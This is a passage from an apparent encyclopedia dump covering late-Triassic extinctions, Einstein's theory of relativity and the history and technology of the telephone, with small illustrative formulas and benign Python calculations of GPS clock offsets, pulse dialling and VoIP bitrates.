Some studies suggest that there were at least two periods of extinction towards the end of the Triassic, separated by 12 to 17 million years. Arguing against this, however, is a study of North American faunas. In the Petrified Forest of northeast Arizona there is a unique sequence of late Carnian-early Norian terrestrial sediments. An analysis in 2002 found no significant change in the paleoenvironment there. Phytosaurs, the most common fossils, experienced a change-over only at the genus level, and the number of species remained the same. Some aetosaurs, the next most common tetrapods, and early dinosaurs passed through unchanged. However, both phytosaurs and aetosaurs were among the groups of archosaur reptiles completely wiped out by the end-Triassic extinction event. It seems likely, then, that there was some sort of end-Carnian extinction, when several herbivorous archosauromorph groups died out, while the large herbivorous therapsids (the kannemeyeriid dicynodonts and the traversodont cynodonts) were much reduced in the northern half of Pangaea (Laurasia). These extinctions within the Triassic and at its end allowed the dinosaurs to expand into many niches that had become unoccupied. Dinosaurs became increasingly dominant, abundant and diverse, and remained that way for the next 150 million years. The true "Age of Dinosaurs" came during the following Jurassic and Cretaceous periods, rather than the Triassic.
Physical sciences
Geological periods
null
30001
https://en.wikipedia.org/wiki/Theory%20of%20relativity
Theory of relativity
The theory of relativity usually encompasses two interrelated physics theories by Albert Einstein: special relativity and general relativity, proposed and published in 1905 and 1915, respectively. Special relativity applies to all physical phenomena in the absence of gravity. General relativity explains the law of gravitation and its relation to the forces of nature. It applies to the cosmological and astrophysical realm, including astronomy. The theory transformed theoretical physics and astronomy during the 20th century, superseding a 200-year-old theory of mechanics created primarily by Isaac Newton. It introduced concepts including 4-dimensional spacetime as a unified entity of space and time, relativity of simultaneity, kinematic and gravitational time dilation, and length contraction. In the field of physics, relativity improved the science of elementary particles and their fundamental interactions, along with ushering in the nuclear age. With relativity, cosmology and astrophysics predicted extraordinary astronomical phenomena such as neutron stars, black holes, and gravitational waves.

Development and acceptance
Albert Einstein published the theory of special relativity in 1905, building on many theoretical results and empirical findings obtained by Albert A. Michelson, Hendrik Lorentz, Henri Poincaré and others. Max Planck, Hermann Minkowski and others did subsequent work. Einstein developed general relativity between 1907 and 1915, with contributions by many others after 1915. The final form of general relativity was published in 1916. The term "theory of relativity" was based on the expression "relative theory" used in 1906 by Planck, who emphasized how the theory uses the principle of relativity. In the discussion section of the same paper, Alfred Bucherer used the expression "theory of relativity" for the first time. By the 1920s, the physics community understood and accepted special relativity. It rapidly became a significant and necessary tool for theorists and experimentalists in the new fields of atomic physics, nuclear physics, and quantum mechanics. By comparison, general relativity did not appear to be as useful, beyond making minor corrections to predictions of Newtonian gravitation theory. It seemed to offer little potential for experimental test, as most of its assertions were on an astronomical scale. Its mathematics seemed difficult and fully understandable only by a small number of people. Around 1960, general relativity became central to physics and astronomy. New mathematical techniques applicable to general relativity streamlined calculations and made its concepts more easily visualized. As astronomical phenomena were discovered, such as quasars (1963), the 3-kelvin microwave background radiation (1965), pulsars (1967), and the first black hole candidates (1981), the theory explained their attributes, and measurement of them further confirmed the theory.

Special relativity
Special relativity is a theory of the structure of spacetime. It was introduced in Einstein's 1905 paper "On the Electrodynamics of Moving Bodies" (for the contributions of many other physicists and mathematicians, see History of special relativity). Special relativity is based on two postulates which are contradictory in classical mechanics:
The laws of physics are the same for all observers in any inertial frame of reference relative to one another (principle of relativity).
The speed of light in vacuum is the same for all observers, regardless of their relative motion or of the motion of the light source.
The resultant theory copes with experiment better than classical mechanics. For instance, postulate 2 explains the results of the Michelson–Morley experiment. Moreover, the theory has many surprising and counterintuitive consequences. Some of these are:
Relativity of simultaneity: Two events, simultaneous for one observer, may not be simultaneous for another observer if the observers are in relative motion.
Time dilation: Moving clocks are measured to tick more slowly than an observer's "stationary" clock.
Length contraction: Objects are measured to be shortened in the direction that they are moving with respect to the observer.
Maximum speed is finite: No physical object, message or field line can travel faster than the speed of light in vacuum. The effect of gravity can only travel through space at the speed of light, not faster or instantaneously.
Mass–energy equivalence: E = mc²; energy and mass are equivalent and transmutable.
Relativistic mass, an idea used by some researchers.
The defining feature of special relativity is the replacement of the Galilean transformations of classical mechanics by the Lorentz transformations. (See Maxwell's equations of electromagnetism.)
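To make these consequences concrete, the standard formulas behind them can be summarized compactly (a sketch added here for illustration; v is the relative speed of the two inertial frames and c the speed of light). The Lorentz transformation for motion along the x-axis is

\[ x' = \gamma (x - vt), \qquad t' = \gamma \left( t - \frac{vx}{c^2} \right), \qquad \gamma = \frac{1}{\sqrt{1 - v^2/c^2}} \]

from which time dilation and length contraction follow directly:

\[ \Delta t = \gamma \, \Delta\tau, \qquad L = \frac{L_0}{\gamma} \]

where Δτ is the proper time of the moving clock and L₀ the proper length of the moving object. Since γ ≥ 1, moving clocks run slow and moving objects are contracted along the direction of motion.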
General relativity
General relativity is a theory of gravitation developed by Einstein in the years 1907–1915. The development of general relativity began with the equivalence principle, under which the states of accelerated motion and being at rest in a gravitational field (for example, when standing on the surface of the Earth) are physically identical. The upshot of this is that free fall is inertial motion: an object in free fall is falling because that is how objects move when there is no force being exerted on them, instead of this being due to the force of gravity as is the case in classical mechanics. This is incompatible with classical mechanics and special relativity because in those theories inertially moving objects cannot accelerate with respect to each other, but objects in free fall do so. To resolve this difficulty Einstein first proposed that spacetime is curved. Einstein discussed his idea with the mathematician Marcel Grossmann, and they concluded that general relativity could be formulated in the context of Riemannian geometry, which had been developed in the 1800s. In 1915, he devised the Einstein field equations, which relate the curvature of spacetime to the mass, energy, and any momentum within it. Some of the consequences of general relativity are:
Gravitational time dilation: Clocks run slower in deeper gravitational wells.
Precession: Orbits precess in a way unexpected in Newton's theory of gravity. (This has been observed in the orbit of Mercury and in binary pulsars.)
Light deflection: Rays of light bend in the presence of a gravitational field.
Frame-dragging: Rotating masses "drag along" the spacetime around them.
Expansion of the universe: The universe is expanding, and certain components within the universe can accelerate the expansion.
Technically, general relativity is a theory of gravitation whose defining feature is its use of the Einstein field equations. The solutions of the field equations are metric tensors which define the topology of the spacetime and how objects move inertially.
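In modern notation, the field equations take the following standard form (added here for illustration; G_{μν} is the Einstein tensor encoding spacetime curvature, g_{μν} the metric tensor, Λ the cosmological constant, G Newton's gravitational constant, and T_{μν} the stress-energy tensor describing matter and energy):

\[ G_{\mu\nu} + \Lambda g_{\mu\nu} = \frac{8 \pi G}{c^4} T_{\mu\nu} \]

The left-hand side describes the geometry of spacetime; the right-hand side describes its matter and energy content, which is what is meant by curvature being related to mass, energy, and momentum.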
Experimental evidence
Einstein stated that the theory of relativity belongs to a class of "principle-theories". As such, it employs an analytic method, which means that the elements of this theory are not based on hypothesis but on empirical discovery. By observing natural processes, we understand their general characteristics, devise mathematical models to describe what we observed, and by analytical means we deduce the necessary conditions that have to be satisfied. Measurement of separate events must satisfy these conditions and match the theory's conclusions.

Tests of special relativity
Relativity is a falsifiable theory: it makes predictions that can be tested by experiment. In the case of special relativity, these include the principle of relativity, the constancy of the speed of light, and time dilation. The predictions of special relativity have been confirmed in numerous tests since Einstein published his paper in 1905, but three experiments conducted between 1881 and 1938 were critical to its validation. These are the Michelson–Morley experiment, the Kennedy–Thorndike experiment, and the Ives–Stilwell experiment. Einstein derived the Lorentz transformations from first principles in 1905, but these three experiments allow the transformations to be induced from experimental evidence. Maxwell's equations, the foundation of classical electromagnetism, describe light as a wave that moves with a characteristic velocity. The modern view is that light needs no medium of transmission, but Maxwell and his contemporaries were convinced that light waves were propagated in a medium, analogous to sound propagating in air, and ripples propagating on the surface of a pond. This hypothetical medium was called the luminiferous aether, at rest relative to the "fixed stars" and through which the Earth moves. Fresnel's partial ether dragging hypothesis ruled out the measurement of first-order (v/c) effects, and although observations of second-order effects (v²/c²) were possible in principle, Maxwell thought they were too small to be detected with then-current technology. The Michelson–Morley experiment was designed to detect second-order effects of the "aether wind", the motion of the aether relative to the Earth. Michelson designed an instrument called the Michelson interferometer to accomplish this. The apparatus was sufficiently accurate to detect the expected effects, but he obtained a null result when the first experiment was conducted in 1881, and again in 1887. Although the failure to detect an aether wind was a disappointment, the results were accepted by the scientific community. In an attempt to salvage the aether paradigm, FitzGerald and Lorentz independently created an ad hoc hypothesis in which the length of material bodies changes according to their motion through the aether. This was the origin of the FitzGerald–Lorentz contraction; their hypothesis had no theoretical basis. The interpretation of the null result of the Michelson–Morley experiment is that the round-trip travel time for light is isotropic (independent of direction), but the result alone is not enough to discount the theory of the aether or validate the predictions of special relativity. While the Michelson–Morley experiment showed that the velocity of light is isotropic, it said nothing about how the magnitude of the velocity changed (if at all) in different inertial frames. The Kennedy–Thorndike experiment was designed to do that, and was first performed in 1932 by Roy Kennedy and Edward Thorndike. They obtained a null result, and concluded that "there is no effect ...
unless the velocity of the solar system in space is no more than about half that of the earth in its orbit". That possibility was thought to be too coincidental to provide an acceptable explanation, so from the null result of their experiment it was concluded that the round-trip time for light is the same in all inertial reference frames. The Ives–Stilwell experiment was carried out by Herbert Ives and G.R. Stilwell, first in 1938 and with better accuracy in 1941. It was designed to test the transverse Doppler effect, the redshift of light from a moving source in a direction perpendicular to its velocity, which had been predicted by Einstein in 1905. The strategy was to compare observed Doppler shifts with what was predicted by classical theory, and look for a Lorentz factor correction. Such a correction was observed, from which it was concluded that the frequency of a moving atomic clock is altered according to special relativity. Those classic experiments have been repeated many times with increased precision. Other experiments include, for instance, relativistic energy and momentum increase at high velocities, experimental testing of time dilation, and modern searches for Lorentz violations.

Tests of general relativity
General relativity has also been confirmed many times, the classic experiments being the perihelion precession of Mercury's orbit, the deflection of light by the Sun, and the gravitational redshift of light. Other tests have confirmed the equivalence principle and frame dragging.

Modern applications
Far from being simply of theoretical interest, relativistic effects are important practical engineering concerns. Satellite-based measurement needs to take into account relativistic effects, as each satellite is in motion relative to an Earth-bound user and is thus in a different frame of reference under the theory of relativity. Global positioning systems such as GPS, GLONASS, and Galileo must account for all of the relativistic effects, such as the consequences of the Earth's gravitational field, in order to work with precision. This is also the case in the high-precision measurement of time. Instruments ranging from electron microscopes to particle accelerators would not work if relativistic considerations were omitted. A rough estimate of the size of these effects for a navigation satellite is sketched below.
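The following back-of-the-envelope script is an added illustration, not part of the original article; the orbital values are rounded, and Earth's rotation and geoid corrections are deliberately ignored. It estimates the two dominant relativistic rate offsets for a GPS satellite clock:

```python
# Back-of-the-envelope estimate of relativistic clock offsets for a GPS
# satellite, using a simplified non-rotating Earth and rounded constants.
GM = 3.986e14        # Earth's gravitational parameter, m^3/s^2
c = 2.998e8          # speed of light, m/s
R_earth = 6.371e6    # mean Earth radius, m
r_orbit = 2.656e7    # GPS orbital radius (~20,200 km altitude), m

v = (GM / r_orbit) ** 0.5                        # circular orbital speed, ~3.9 km/s
sr_rate = -v**2 / (2 * c**2)                     # special relativity: orbiting clock runs slow
gr_rate = GM * (1/R_earth - 1/r_orbit) / c**2    # general relativity: higher clock runs fast

day = 86400  # seconds per day
print(f"velocity time dilation:  {sr_rate * day * 1e6:+.1f} microseconds/day")
print(f"gravitational blueshift: {gr_rate * day * 1e6:+.1f} microseconds/day")
print(f"net offset:              {(sr_rate + gr_rate) * day * 1e6:+.1f} microseconds/day")
# This simplified model gives roughly -7 and +50 microseconds/day. The commonly
# quoted figures (-7.2 and +45.7, net about +38.6) additionally account for
# Earth's rotation and the geoid potential, which this sketch omits.
```

Either way, the net drift is tens of microseconds per day; at the speed of light that corresponds to kilometers of position error per day if left uncorrected, which is why satellite navigation systems must build these corrections in.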
Physical sciences
Physics
null
30003
https://en.wikipedia.org/wiki/Telephone
Telephone
A telephone, colloquially referred to as a phone, is a telecommunications device that enables two or more users to conduct a conversation when they are too far apart to be easily heard directly. A telephone converts sound, typically and most efficiently the human voice, into electronic signals that are transmitted via cables and other communication channels to another telephone which reproduces the sound to the receiving user. The term is derived from Ancient Greek τῆλε (tēle, "far") and φωνή (phōnē, "voice"), together meaning "distant voice". In 1876, Alexander Graham Bell was the first to be granted a United States patent for a device that produced clearly intelligible replication of the human voice at a second device. This instrument was further developed by many others, and rapidly became indispensable in business, government, and households. The essential elements of a telephone are a microphone (transmitter) to speak into and an earphone (receiver) which reproduces the voice at a distant location. The receiver and transmitter are usually built into a handset which is held up to the ear and mouth during conversation. The transmitter converts the sound waves to electrical signals which are sent through the telecommunications system to the receiving telephone, which converts the signals into audible sound in the receiver or sometimes a loudspeaker. Telephones permit transmission in both directions simultaneously. Most telephones also contain an alerting feature, such as a ringer or a visual indicator, to announce an incoming telephone call. Telephone calls are initiated most commonly with a keypad or dial, affixed to the telephone, to enter a telephone number, which is the address of the call recipient's telephone in the telecommunications system, but other methods existed in the early history of the telephone. The first telephones were directly connected to each other from one customer's office or residence to another customer's location. Being impractical beyond just a few customers, these systems were quickly replaced by manually operated centrally located switchboards. These exchanges were soon connected together, eventually forming an automated, worldwide public switched telephone network. For greater mobility, various radio systems were developed in the mid-20th century for transmission between mobile stations on ships and in automobiles. Handheld mobile phones were introduced for personal service starting in 1973. In later decades, the analog cellular system evolved into digital networks with greater capability and lower cost. Convergence in communication services has provided a broad spectrum of capabilities in cell phones, including mobile computing, giving rise to the smartphone, the dominant type of telephone in the world today. Modern telephones exist in various forms and are implemented through different systems, including fixed-line, cellular, satellite, and Internet-based devices, all of which are integrated into a global telecommunication network. This interconnected system allows any telephone, regardless of its underlying technology or geographic location, to reach another through a unique telephone number. While mobile and landline services are fully integrated into the public switched telephone network (PSTN), some Internet-based services, such as VoIP, may not always be directly connected to the PSTN, though they still allow communication across different systems when a connection is made. This ensures that a telephone number can be used universally to connect individuals globally.
Early history
Before the development of the electric telephone, the term telephone was applied to other inventions, and not all early researchers of the electrical device used the term. Perhaps the earliest use of the word for a communications system was the telephon created by Gottfried Huth in 1796. Huth proposed an alternative to the optical telegraph of Claude Chappe in which the operators in the signaling towers would shout to each other by means of what he called "speaking tubes", but would now be called giant megaphones. A communication device for sailing vessels, called telephone, was invented by Captain John Taylor in 1844. This instrument used four air horns to communicate with vessels in foggy weather. Johann Philipp Reis used the term in reference to his invention, commonly known as the Reis telephone, in c. 1860. His device appears to be the first device based on the conversion of sound into electrical impulses. The term telephone was adopted into the vocabulary of many languages. It is derived from the Ancient Greek τῆλε (tēle), "far", and φωνή (phōnē), "voice", together meaning "distant voice". Credit for the invention of the electric telephone is frequently disputed. As with other influential inventions such as radio, television, the light bulb, and the computer, several inventors pioneered experimental work on voice transmission over a wire and improved on each other's ideas. New controversies over the issue still arise from time to time. Charles Bourseul, Antonio Meucci, Johann Philipp Reis, Alexander Graham Bell, and Elisha Gray, amongst others, have all been credited with the invention of the telephone. Alexander Graham Bell was the first to be awarded a patent for the electric telephone by the United States Patent and Trademark Office (USPTO) in March 1876. Before Bell's patent, the telephone transmitted sound in a way that was similar to the telegraph. This method used vibrations and circuits to send electrical pulses, but was missing key features. Bell found that this method produced a sound through intermittent currents, but that a fluctuating current reproduced sounds best. The fluctuating current became the basis for the working telephone, creating Bell's patent. That first patent by Bell was the master patent of the telephone, from which other patents for electric telephone devices and features flowed. In 1876, shortly after Bell's patent application, Hungarian engineer Tivadar Puskás proposed the telephone switch, which allowed for the formation of telephone exchanges, and eventually networks. In the United Kingdom, the blower is used as a slang term for a telephone. The term came from navy slang for a speaking tube. In the U.S., a somewhat dated slang term refers to the telephone as "the horn", as in "I couldn't get him on the horn" or "I'll be off the horn in a moment."

Timeline of early development
1844: Innocenzo Manzetti first mooted the idea of a "speaking telegraph" or telephone. Use of the "speaking telegraph" and "sound telegraph" monikers would eventually be replaced by the newer, distinct name, "telephone".
26 August 1854: Charles Bourseul published an article in the magazine L'Illustration (Paris), "Transmission électrique de la parole" (electric transmission of speech), describing a "make-and-break" type telephone transmitter later created by Johann Reis.
26 October 1861: Johann Philipp Reis (1834–1874) publicly demonstrated the Reis telephone before the Physical Society of Frankfurt.
It was the first device to transmit a voice via electronic signals, and was for that reason the first modern telephone. Reis also coined the term. He used his telephone to transmit the phrase "Das Pferd frisst keinen Gurkensalat" ("The horse does not eat cucumber salad").
22 August 1865: La Feuille d'Aoste reported "It is rumored that English technicians to whom Manzetti illustrated his method for transmitting spoken words on the telegraph wire intend to apply said invention in England on several private telegraph lines". However, telephones would not be demonstrated there until 1876, with a set of telephones from Bell.
28 December 1871: Antonio Meucci files patent caveat No. 3335 in the U.S. Patent Office, titled "Sound Telegraph", describing communication of voice between two people by wire. A patent caveat was not an invention patent award, but only an unverified notice filed by an individual of an intention to file a patent application in the future.
1874: Meucci, after having renewed the caveat for two years, does not renew it again, and the caveat lapses.
6 April 1875: Bell's U.S. Patent 161,739 "Transmitters and Receivers for Electric Telegraphs" is granted. This uses multiple vibrating steel reeds in make-break circuits.
11 February 1876: Elisha Gray invents a liquid transmitter for use with the telephone, but does not build one.
14 February 1876: Gray files a patent caveat for transmitting the human voice through a telegraphic circuit.
14 February 1876: Alexander Graham Bell applies for the patent "Improvements in Telegraphy", for electromagnetic telephones using what is now called amplitude modulation (oscillating current and voltage) but which he referred to as "undulating current".
19 February 1876: Gray is notified by the U.S. Patent Office of an interference between his caveat and Bell's patent application. Gray decides to abandon his caveat.
7 March 1876: Bell's U.S. patent 174,465 "Improvement in Telegraphy" is granted, covering "the method of, and apparatus for, transmitting vocal or other sounds telegraphically…by causing electrical undulations, similar in form to the vibrations of the air accompanying the said vocal or other sound."
10 March 1876: The first successful telephone transmission of clear speech using a liquid transmitter takes place when Bell speaks into his device, "Mr. Watson, come here, I want to see you," and Watson hears each word distinctly.
30 January 1877: Bell's U.S. patent 186,787 is granted for an electromagnetic telephone using permanent magnets, iron diaphragms, and a call bell.
27 April 1877: Thomas Edison files a patent application for a carbon (graphite) transmitter. It was published as No. 474,230 on 3 May 1892, after a 15-year delay because of litigation. Edison was granted patent 222,390 for a carbon granules transmitter in 1879.

Early commercial instruments
Early telephones were technically diverse. Some used a water microphone, some had a metal diaphragm that induced current in an electromagnet wound around a permanent magnet, and some were dynamic – their diaphragm vibrated a coil of wire in the field of a permanent magnet, or the coil vibrated the diaphragm. The sound-powered dynamic variants survived in small numbers through the 20th century in military and maritime applications, where the ability to create their own electrical power was crucial.
Most, however, used the Edison/Berliner carbon transmitter, which was much louder than the other kinds, even though it required an induction coil – an impedance-matching transformer – to make it compatible with the impedance of the line. The Edison patents kept the Bell monopoly viable into the 20th century, by which time the network was more important than the instrument.
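The matching works because a transformer scales impedance by the square of its turns ratio. As an illustrative calculation (the 600 Ω nominal line impedance is a telephony convention; the 50 Ω transmitter resistance is an assumed round number, not a figure from the article):

\[ \frac{Z_\text{line}}{Z_\text{transmitter}} = \left( \frac{N_\text{line}}{N_\text{transmitter}} \right)^{2} \quad\Rightarrow\quad \frac{N_\text{line}}{N_\text{transmitter}} = \sqrt{\frac{600~\Omega}{50~\Omega}} \approx 3.5 \]

so a winding ratio of roughly 3.5:1 would present the low-resistance carbon transmitter to the line at the line's own impedance, maximizing power transfer.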
Early telephones were locally powered, using either a dynamic transmitter or powering the transmitter with a local battery. One of the jobs of outside plant personnel was to visit each telephone periodically to inspect the battery. During the 20th century, telephones powered from the telephone exchange over the same wires that carried the voice signals became common. Early telephones used a single wire for the subscriber's line, with ground return used to complete the circuit (as used in telegraphs). The earliest dynamic telephones also had only one port opening for sound, with the user alternately listening and speaking (or rather, shouting) into the same hole. Sometimes the instruments were operated in pairs at each end, making conversation more convenient but also more expensive. At first, the benefits of a telephone exchange were not exploited. Instead, telephones were leased in pairs to a subscriber, who had to arrange for a telegraph contractor to construct a line between them, for example, between a home and a shop. Users who wanted the ability to speak to several different locations would need to obtain and set up three or four pairs of telephones. Western Union, already using telegraph exchanges, quickly extended the principle to its telephones in New York City and San Francisco, and Bell was not slow in appreciating the potential. Signalling began in an appropriately primitive manner. The user alerted the other end, or the exchange operator, by whistling into the transmitter. Exchange operation soon resulted in telephones being equipped with a bell in a ringer box, first operated over a second wire, and later over the same wire, but with a condenser (capacitor) in series with the bell coil to allow the AC ringer signal through while still blocking DC (keeping the phone "on hook"). Telephones connected to the earliest Strowger switch automatic exchanges had seven wires: one for the knife switch, one for each telegraph key, one for the bell, one for the push-button and two for speaking. Large wall telephones in the early 20th century usually incorporated the bell, and separate bell boxes for desk phones dwindled away in the middle of the century. Rural and other telephones that were not on a common battery exchange had a magneto hand-cranked generator to produce a high voltage alternating signal to ring the bells of other telephones on the line and to alert the operator. Some local farming communities that were not connected to the main networks set up barbed wire telephone lines that exploited the existing system of field fences to transmit the signal. In the 1890s a new smaller style of telephone was introduced, packaged in three parts. The transmitter stood on a stand, known as a "candlestick" for its shape. When not in use, the receiver hung on a hook with a switch in it, known as a "switchhook". Previous telephones required the user to operate a separate switch to connect either the voice or the bell. With the new kind, the user was less likely to leave the phone "off the hook". In phones connected to magneto exchanges, the bell, induction coil, battery and magneto were in a separate bell box or "ringer box". In phones connected to common battery exchanges, the ringer box was installed under a desk, or other out-of-the-way place, since it did not need a battery or magneto. Cradle designs were also used at this time, having a handle with the receiver and transmitter attached, now called a handset, separate from the cradle base that housed the magneto crank and other parts. They were larger than the "candlestick" and more popular. Disadvantages of single-wire operation, such as crosstalk and hum from nearby AC power wires, had already led to the use of twisted pairs and, for long-distance telephones, four-wire circuits. Users at the beginning of the 20th century did not place long-distance calls from their own telephones but made an appointment and were connected with the assistance of a telephone operator. What turned out to be the most popular and longest-lasting physical style of telephone was introduced in the early 20th century, including Bell's 202-type desk set. A carbon granule transmitter and electromagnetic receiver were united in a single molded plastic handle, which when not in use was secured in a cradle in the base unit. In the model 202 circuit, the transmitter was connected directly to the line, while the receiver was inductively coupled. In local battery configurations, when the local loop was too long to provide sufficient current from the exchange, the transmitter was powered by a local battery and inductively coupled, while the receiver was included in the local loop. The coupling transformer and the ringer were mounted in a separate enclosure, called the subscriber set. The dial switch in the base interrupted the line current by repeatedly but very briefly disconnecting the line one to ten times for each digit (a timing sketch appears at the end of this section), and the hook switch disconnected the line and the transmitter battery while the handset was on the cradle. In the 1930s, telephone sets were developed that combined the bell and induction coil with the desk set, obviating a separate ringer box. The rotary dial, becoming commonplace in the 1930s in many areas, enabled customer-dialed service, but some magneto systems remained even into the 1960s. After World War II, the telephone networks saw rapid expansion, and more efficient telephone sets, such as the model 500 telephone in the United States, were developed that permitted larger local networks centered around central offices. A breakthrough new technology was the introduction of Touch-Tone signaling using push-button telephones by American Telephone & Telegraph Company (AT&T) in 1963.
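The loop-disconnect ("pulse") dialling described above is easy to sketch in code. The following Python fragment is an illustrative sketch, not drawn from the article: the 10 pulses-per-second rate and roughly 60/40 break/make ratio are typical North American figures, and exact timings varied between administrations.

```python
def pulse_timings(digit, pps=10, break_ratio=0.6):
    """Return (state, seconds) pairs for dialling one digit by pulsing.

    Each pulse briefly breaks the loop current; "0" is sent as ten pulses.
    """
    pulses = 10 if digit == 0 else digit
    period = 1.0 / pps  # one pulse every 100 ms at 10 pulses per second
    timings = []
    for _ in range(pulses):
        timings.append(("break", period * break_ratio))        # loop opened
        timings.append(("make", period * (1 - break_ratio)))   # loop closed
    timings.append(("interdigit", 0.7))  # pause so the exchange can separate digits
    return timings

print(pulse_timings(3))  # three 60 ms breaks, each followed by a 40 ms make
```

The interdigit pause is what lets the exchange distinguish, say, "1" followed by "1" from a single "2"; Touch-Tone replaced this slow current-interruption scheme with pairs of audio tones.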
Sound-powered telephones
A sound-powered telephone is a telephone which transmits voice communication by wire, powered by the energy of the sound waves of the operator speaking.

Principle of operation
A moving-coil microphone converts the sound waves into an electrical signal, which is then converted back into sound waves at the receiver's end. Similar to early regular landline telephones, operators of sound-powered telephones generally alert the receiver of a call using a hand-cranked generator (magneto), which generates an electrical current which activates a buzzer at the receiver's end, sometimes known as a howler or growler. Some telephone systems can use external electrical power to operate ringers or amplifiers, but will revert to sound-powered communications in the event of failure of the external power supply. Stations are usually connected via twisted-pair wires to reduce electrical interference, and can be positioned at considerable distances from each other, on the order of several kilometers. Using twisted-pair wiring with a 1 mm core diameter, some sound-powered telephone systems can operate a pair of handsets positioned up to 48 km (30 miles) apart.

Applications
Because sound-powered telephones do not require external electrical power, they are used where reliable communications are vital even in the event of loss of power. They are often used for communications in airports, railways and public utilities, mining, ski slopes, bridges, sporting arenas and shipyards. Because they operate at low voltages, they are suitable for use in situations where there is a risk of explosions or fire, such as chemical plants, oil and gas works, arsenals, mines and quarries. They are frequently used aboard ships, especially naval vessels, and in land military communications. Aboard naval vessels, sound-powered telephones generally have auxiliary wiring circuits routed through the ship, to reduce the likelihood that all circuits will be rendered inoperable by battle damage.

Digital telephones and voice over IP
The invention of the transistor in 1947 dramatically changed the technology used in telephone systems and in the long-distance transmission networks over the next several decades. With the development of stored program control and MOS integrated circuits for electronic switching systems, and new transmission technologies such as pulse-code modulation (PCM), telephony gradually evolved towards digital telephony, which improved the capacity, quality, and cost of the network. Integrated Services Digital Network (ISDN) was launched in the 1980s, providing businesses and consumers with access to digital telephony services such as data, voice, video, and fax services. The development of digital data communications methods made it possible to digitize voice and transmit it as real-time data across computer networks and the Internet, giving rise to the field of Internet Protocol (IP) telephony, also known as voice over Internet Protocol (VoIP). VoIP has proven to be a disruptive technology that is rapidly replacing traditional telephone network infrastructure. By January 2005, up to 10% of telephone subscribers in Japan and South Korea had switched to this digital telephone service. A January 2005 Newsweek article suggested that Internet telephony may be "the next big thing." The technology has spawned a new industry comprising many VoIP companies that offer services to consumers and businesses. The reported global VoIP market in October 2021 was $85.2 billion, with a projection of $102.5 billion by 2026. IP telephony uses high-bandwidth Internet connections and specialized customer premises equipment to transmit telephone calls via the Internet, or any modern private data network. The customer equipment may be an analog telephone adapter (ATA), which translates the signals of a conventional analog telephone; an IP phone, a dedicated standalone device; or a computer softphone application, utilizing the microphone and headset devices of a personal computer or smartphone.
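The arithmetic behind the PCM digitization mentioned above is simple, and shows why a digitized voice channel needs more bandwidth once it is carried over IP. A sketch (the figures used are the standard narrowband-telephony parameters of 8 kHz sampling with 8-bit samples, as in the common G.711 codec, plus typical IPv4/UDP/RTP header sizes):

```python
# Raw bit rate of a standard narrowband PCM voice channel (G.711-style):
sample_rate = 8000      # samples per second (covers roughly 300-3400 Hz speech)
bits_per_sample = 8     # companded 8-bit samples
voice_bps = sample_rate * bits_per_sample
print(voice_bps)        # 64000 bits/s -- the classic 64 kbit/s digital channel

# Carried over IP, each packet adds header overhead. With 20 ms of audio per
# packet (160 samples) and IPv4 + UDP + RTP headers (20 + 8 + 12 bytes):
payload_bytes = 160
header_bytes = 20 + 8 + 12
packets_per_second = 50  # 1000 ms / 20 ms
ip_bps = (payload_bytes + header_bytes) * 8 * packets_per_second
print(ip_bps)            # 80000 bits/s, before any link-layer framing
```

Modern VoIP deployments usually reduce this with compressing codecs, but the 64 kbit/s PCM channel remains the reference unit of the digital telephone network.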
In recent years, VoIP technology has evolved to integrate with mobile networks, including Voice over LTE (VoLTE) and Voice over 5G (Vo5G), enabling seamless voice communication over mobile data networks. These advancements have made VoIP not only a primary method for Internet-based communication but also a central feature of modern mobile communication infrastructure. While traditional analog telephones are typically powered from the central office through the telephone line, digital telephones require a local power supply. Internet-based digital service also requires special provisions to provide the service location to the emergency services when an emergency telephone number is called.

Cordless telephones
A cordless telephone or portable telephone consists of a base station unit and one or more portable cordless handsets. The base station connects to a telephone line, or provides service by voice over IP (VoIP). The handset communicates with the base station via radio frequency signals. A handset's operational range is limited, usually to within the same building or within a short distance from the base station.

Base station
Base stations include a radio transceiver which enables full-duplex, outgoing and incoming signals and speech with the handsets. The base station often includes a microphone, audio amplifier, and a loudspeaker to enable hands-free speakerphone conversations, without needing to use a handset. The base station may also have a numeric keypad for dialing, and a display for caller ID. In addition, an answering machine function may be built in. The cordless handset contains a rechargeable battery, which the base station recharges when the handset rests in its cradle. Multi-handset systems generally also have additional charging stands. A cordless telephone typically requires a constant electricity supply to power the base station and charger units by means of a DC transformer which plugs into a wall AC power outlet.

Mobile phones
A mobile phone, cellphone, or hand phone is a handheld telephone which connects via radio transmissions to a cellular telephone network. The cellular network consists of a network of ground-based transmitter/receiver stations with antennas – which are usually located on towers or on buildings – and infrastructure connecting to the global telecommunications network. Analog cellular networks first appeared in 1979, followed by the introduction of digital cellular networks in the early 1990s, marking the beginning of the GSM standard. Over time, these networks evolved, with each new generation (2G, 3G, 4G, and beyond) offering improved data transmission capabilities and more advanced features for mobile communication. Mobile phones require a SIM card to be inserted into the phone. The SIM card is a small PVC card containing a small integrated circuit which stores the user's international mobile subscriber identity (IMSI) number and its related key, which are used to identify and authenticate subscribers to the cellular network. Mobile phones generally incorporate an LCD or OLED display, with some types, such as smartphones, having touch screens. Since the 1990s, mobile phones have gained other features which are not directly related to their primary function as telephones. These include text messaging, calendars, alarm clocks, personal schedulers, cameras, music players, games and, later, internet access and smartphone functionality.
Nearly all mobile phones have the ability to send text messages to other users via the SMS (Short Message Service) protocol. The Multimedia Messaging Service (MMS) protocol enables users to send and receive multimedia content, such as photos, audio files and video files. As their functionality has increased over the years, many types of mobile phone, notably smartphones, require an operating system to run. Popular mobile phone operating systems in the past have included Symbian, Palm OS, BlackBerry OS and mobile phone versions of Windows. As of 2022, the most used operating systems are Google's Android and Apple's iOS. Before the era of smartphones, mobile phones were generally manufactured by companies specializing in telecommunications equipment, such as Nokia, Motorola, and Ericsson. Since the advent of smartphones, mobile phone manufacturers have also included consumer electronics companies, such as Apple, Samsung and Xiaomi.

Smartphones
